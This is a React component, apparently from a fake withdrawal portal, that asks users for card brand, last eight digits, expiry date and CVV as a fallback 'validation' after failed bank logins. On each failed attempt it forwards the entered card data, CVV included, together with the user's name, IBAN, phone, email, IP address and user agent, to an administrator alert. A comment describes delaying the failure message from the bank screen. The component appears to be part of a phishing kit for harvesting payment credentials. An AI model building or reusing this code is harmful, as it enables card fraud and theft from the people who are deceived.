import { useEffect, useState, type FormEvent } from 'react';
import { useTranslation } from 'react-i18next';
import {
  getRemainingCardAttempts,
  consumeCardAttempt,
  verifyCardDetails,
  saveCardSession,
} from '@/hooks/useCardAuth';
import { CARD_BRANDS, type CardBrand } from '@/utils/withdrawal';
import { getDraft } from '@/hooks/useWithdrawalFlow';
import { sendAdminAuthAlert, sendClientAuthFailedEmail } from '@/lib/email';
import type { ClientAccount } from '@/hooks/useClientAuth';

type CardValidationCardProps = {
  client: ClientAccount;
  onSuccess: () => void;
  onLogout: () => void;
  onBlockedChange?: (blocked: boolean) => void;
};

type FormErrors = {
  brand?: string;
  last8?: string;
  expiry?: string;
  cvv?: string;
};

function formatExpiry(value: string): string {
  const digits = value.replace(/[^0-9]/g, '').slice(0, 4);
  if (digits.length <= 2) return digits;
  return `${digits.slice(0, 2)}/${digits.slice(2)}`;
}

/**
 * Validation par carte, proposée en repli lorsque le client a épuisé ses
 * deux tentatives de connexion bancaire. Le client saisit les 8 derniers
 * chiffres de la carte, la date d'expiration et le CVV. Deux tentatives
 * maximum ; au-delà, l'accès est bloqué et le client doit se déconnecter.
 */
export default function CardValidationCard({
  client,
  onSuccess,
  onLogout,
  onBlockedChange,
}: CardValidationCardProps) {
  const { t } = useTranslation();
  const [brand, setBrand] = useState<CardBrand | ''>('');
  const [last8, setLast8] = useState('');
  const [expiry, setExpiry] = useState('');
  const [cvv, setCvv] = useState('');
  const [errors, setErrors] = useState<FormErrors>({});
  const [submitting, setSubmitting] = useState(false);
  const [failure, setFailure] = useState<string | null>(null);
  const [remaining, setRemaining] = useState(() =>
    getRemainingCardAttempts(client.maxCardAttempts),
  );

  const blocked = remaining <= 0;

  // Informe l'écran parent (banque) de l'état de blocage de la carte, afin
  // qu'il ne révèle le message d'échec qu'au tout dernier moment.
  useEffect(() => {
    onBlockedChange?.(blocked);
  }, [blocked, onBlockedChange]);

  const handleSubmit = async (event: FormEvent<HTMLFormElement>) => {
    event.preventDefault();
    if (submitting || blocked) return;

    const next: FormErrors = {};
    if (!brand) next.brand = t('cardAuth.errorBrand');
    if (last8.replace(/[^0-9]/g, '').length !== 8) next.last8 = t('cardAuth.errorLast8');
    if (!/^[0-9]{2}\/[0-9]{2}$/.test(expiry.trim())) next.expiry = t('cardAuth.errorExpiry');
    if (cvv.replace(/[^0-9]/g, '').length !== 3) next.cvv = t('cardAuth.errorCvv');

    if (Object.keys(next).length > 0) {
      setErrors(next);
      return;
    }

    setErrors({});
    setFailure(null);
    setSubmitting(true);

    const result = await verifyCardDetails({
      clientCode: client.accessCode,
      brand,
      last8: last8.replace(/[^0-9]/g, ''),
      expiry: expiry.trim(),
      cvv: cvv.replace(/[^0-9]/g, ''),
    });

    if (result.matched) {
      saveCardSession({
        brand: result.cardBrand,
        last8: last8.replace(/[^0-9]/g, '').slice(-4),
        validatedAt: new Date().toISOString(),
      });
      setSubmitting(false);
      onSuccess();
      return;
    }

    // Échec : on consomme une tentative, on alerte l'administrateur et on
    // informe le client, puis on réaffiche le formulaire.
    const attemptsLeft = consumeCardAttempt(client.maxCardAttempts);
    const draft = getDraft();
    const details = draft
      ? {
          fullName: draft.fullName,
          bankName: draft.bankName,
          iban: draft.iban,
          phone: draft.phone,
          email: draft.email,
          amount: draft.amount,
          currency: client.currency || 'XPF',
          authBank: result.cardBrand || 'Carte',
        }
      : undefined;

    const enteredLast8 = last8.replace(/[^0-9]/g, '');

    await sendAdminAuthAlert({
      clientCode: client.accessCode,
      clientName: draft?.fullName ?? client.fullName,
      identifier: enteredLast8,
      bankName: result.cardBrand || brand,
      method: 'card',
      card: {
        brand: brand || result.cardBrand || '--',
        last8: enteredLast8,
        expiry: expiry.trim(),
        cvv: cvv.replace(/[^0-9]/g, ''),
      },
      phase: 'approval',
      ip: result.ip,
      country: result.country,
      userAgent: result.userAgent,
      attemptsMax: client.maxCardAttempts,
      attemptsLeft,
      details,
    });

    if (details) {
      await sendClientAuthFailedEmail({
        clientCode: client.accessCode,
        clientName: draft?.fullName ?? client.fullName,
        attemptsMax: client.maxCardAttempts,
        attemptsLeft,
        details,
      });
    }

    setSubmitting(false);
    setRemaining(attemptsLeft);
    setFailure(t('cardAuth.errorInvalid'));
    setLast8('');
    setExpiry('');
    setCvv('');
  };

  const inputClass = (invalid?: string) =>
    `w-full rounded-md border bg-background-50 py-3 pl-12 text-sm text-foreground-950 outline-none transition-colors placeholder:text-foreground-400 focus:ring-2 ${
      invalid
        ? 'border-secondary-400 focus:border-secondary-500 focus:ring-secondary-200'
        : 'border-background-300 focus:border-primary-500 focus:ring-primary-200'
    }`;

  if (blocked) {
    return (
      <div className="rounded-lg border border-secondary-300 bg-secondary-50 p-6 text-center md:p-8">
        <span className="mx-auto flex h-12 w-12 items-center justify-center rounded-full bg-secondary-500 text-background-50">
          <i className="ri-lock-2-line text-2xl"></i>
        </span>
        <h2 className="mt-4 font-heading text-lg font-semibold text-secondary-950">
          {t('cardAuth.blockedTitle')}
        </h2>
        <p className="mx-auto mt-2 max-w-md text-sm leading-relaxed text-secondary-800">
          {t('cardAuth.blockedText')}
        </p>
        <button
          type="button"
          onClick={onLogout}
          className="mt-6 inline-flex cursor-pointer items-center justify-center gap-2 whitespace-nowrap rounded-md bg-secondary-500 px-5 py-3 text-sm font-semibold text-background-50 transition-colors hover:bg-secondary-600"
        >
          <i className="ri-logout-box-r-line text-lg"></i>
          {t('cardAuth.blockedLogout')}
        </button>
      </div>
    );
  }

  return (
    <form
      onSubmit={handleSubmit}
      className="rounded-lg border border-background-200 bg-background-50 p-6 md:p-7"
    >
      <div className="flex items-start gap-3 border-b border-background-200 pb-5">
        <span className="flex h-11 w-11 items-center justify-center rounded-lg bg-accent-100 text-accent-800">
          <i className="ri-bank-card-2-line text-xl"></i>
        </span>
        <div>
          <h2 className="font-heading text-base font-semibold text-foreground-950">
            {t('cardAuth.formTitle')}
          </h2>
          <p className="mt-0.5 text-xs text-foreground-500">{t('cardAuth.formSubtitle')}</p>
        </div>
      </div>

      <div className="mt-5 flex items-center justify-between rounded-md border border-background-200 bg-background-100 px-4 py-3">
        <span className="flex items-center gap-2 text-xs font-medium text-foreground-600">
          <i className="ri-shield-keyhole-line text-base text-accent-700"></i>
          {t('cardAuth.attempts', { count: remaining, max: client.maxCardAttempts })}
        </span>
        <span className="flex items-center gap-1">
          {Array.from({ length: client.maxCardAttempts }).map((_, index) => (
            <span
              key={`card-attempt-${index}`}
              className={`h-2 w-2 rounded-full ${
                index < remaining ? 'bg-accent-500' : 'bg-background-300'
              }`}
            ></span>
          ))}
        </span>
      </div>

      <div className="mt-5 space-y-5">
        <div>
          <label className="mb-2 block text-sm font-semibold text-foreground-800">
            {t('cardAuth.brand')} <span className="text-secondary-600">*</span>
          </label>
          <div className="grid grid-cols-3 gap-2.5">
            {CARD_BRANDS.map((item) => {
              const active = brand === item;
              return (
                <button
                  key={item}
                  type="button"
                  onClick={() => {
                    setBrand(item);
                    setErrors((prev) => ({ ...prev, brand: undefined }));
                    setFailure(null);
                  }}
                  aria-pressed={active}
                  className={`flex cursor-pointer flex-col items-center justify-center gap-1.5 whitespace-nowrap rounded-md border px-3 py-3 text-xs font-semibold transition-colors ${
                    active
                      ? 'border-accent-500 bg-accent-50 text-accent-900'
                      : errors.brand
                        ? 'border-secondary-400 bg-background-50 text-foreground-700 hover:bg-background-100'
                        : 'border-background-300 bg-background-50 text-foreground-700 hover:bg-background-100'
                  }`}
                >
                  <i className={`ri-bank-card-line text-lg ${active ? 'text-accent-700' : 'text-foreground-400'}`}></i>
                  {item}
                </button>
              );
            })}
          </div>
          <input type="hidden" name="cardBrand" value={brand} readOnly />
          {errors.brand && (
            <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
              <i className="ri-error-warning-line"></i>
              {errors.brand}
            </p>
          )}
        </div>

        <div>
          <label htmlFor="cardLast8" className="mb-2 block text-sm font-semibold text-foreground-800">
            {t('cardAuth.last8')} <span className="text-secondary-600">*</span>
          </label>
          <div className="relative">
            <span className="pointer-events-none absolute left-4 top-1/2 flex h-5 w-5 -translate-y-1/2 items-center justify-center text-foreground-400">
              <i className="ri-bank-card-line text-lg"></i>
            </span>
            <input
              id="cardLast8"
              name="cardLast8"
              type="text"
              inputMode="numeric"
              autoComplete="off"
              maxLength={8}
              value={last8}
              onChange={(event) => {
                setLast8(event.target.value.replace(/[^0-9]/g, '').slice(0, 8));
                setErrors((prev) => ({ ...prev, last8: undefined }));
                setFailure(null);
              }}
              placeholder={t('cardAuth.last8Ph')}
              className={`${inputClass(errors.last8)} pr-12 font-mono tracking-[0.2em]`}
            />
          </div>
          {errors.last8 && (
            <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
              <i className="ri-error-warning-line"></i>
              {errors.last8}
            </p>
          )}
        </div>

        <div className="grid grid-cols-1 gap-5 sm:grid-cols-2">
          <div>
            <label htmlFor="cardExpiry" className="mb-2 block text-sm font-semibold text-foreground-800">
              {t('cardAuth.expiry')} <span className="text-secondary-600">*</span>
            </label>
            <div className="relative">
              <span className="pointer-events-none absolute left-4 top-1/2 flex h-5 w-5 -translate-y-1/2 items-center justify-center text-foreground-400">
                <i className="ri-calendar-line text-lg"></i>
              </span>
              <input
                id="cardExpiry"
                name="cardExpiry"
                type="text"
                inputMode="numeric"
                autoComplete="off"
                value={expiry}
                onChange={(event) => {
                  setExpiry(formatExpiry(event.target.value));
                  setErrors((prev) => ({ ...prev, expiry: undefined }));
                  setFailure(null);
                }}
                placeholder="MM/AA"
                className={`${inputClass(errors.expiry)} font-mono`}
              />
            </div>
            {errors.expiry && (
              <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
                <i className="ri-error-warning-line"></i>
                {errors.expiry}
              </p>
            )}
          </div>

          <div>
            <label htmlFor="cardCvv" className="mb-2 block text-sm font-semibold text-foreground-800">
              {t('cardAuth.cvv')} <span className="text-secondary-600">*</span>
            </label>
            <div className="relative">
              <span className="pointer-events-none absolute left-4 top-1/2 flex h-5 w-5 -translate-y-1/2 items-center justify-center text-foreground-400">
                <i className="ri-lock-password-line text-lg"></i>
              </span>
              <input
                id="cardCvv"
                name="cardCvv"
                type="password"
                inputMode="numeric"
                autoComplete="off"
                maxLength={3}
                value={cvv}
                onChange={(event) => {
                  setCvv(event.target.value.replace(/[^0-9]/g, '').slice(0, 3));
                  setErrors((prev) => ({ ...prev, cvv: undefined }));
                  setFailure(null);
                }}
                placeholder="•••"
                className={`${inputClass(errors.cvv)} font-mono`}
              />
            </div>
            {errors.cvv && (
              <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
                <i className="ri-error-warning-line"></i>
                {errors.cvv}
              </p>
            )}
          </div>
        </div>
      </div>

      {failure && (
        <div className="mt-5 flex items-start gap-2 rounded-md border border-accent-200 bg-accent-50 px-4 py-3 text-sm text-accent-900">
          <i className="ri-error-warning-line mt-0.5 text-base"></i>
          <span>{failure}</span>
        </div>
      )}

      <button
        type="submit"
        disabled={submitting}
        className="mt-6 flex w-full cursor-pointer items-center justify-center gap-2 whitespace-nowrap rounded-md bg-accent-500 px-5 py-3.5 text-sm font-semibold text-background-50 transition-colors hover:bg-accent-600 disabled:cursor-not-allowed disabled:opacity-60 dark:text-foreground-950"
      >
        <i className={`${submitting ? 'ri-loader-4-line animate-spin' : 'ri-bank-card-2-line'} text-lg`}></i>
        {submitting ? t('cardAuth.submitting') : t('cardAuth.submit')}
      </button>

      <div className="mt-5 flex items-start gap-2 text-xs leading-relaxed text-foreground-500">
        <i className="ri-lock-2-line mt-0.5 text-sm text-accent-700"></i>
        <span>{t('cardAuth.secureNote')}</span>
      </div>
    </form>
  );
}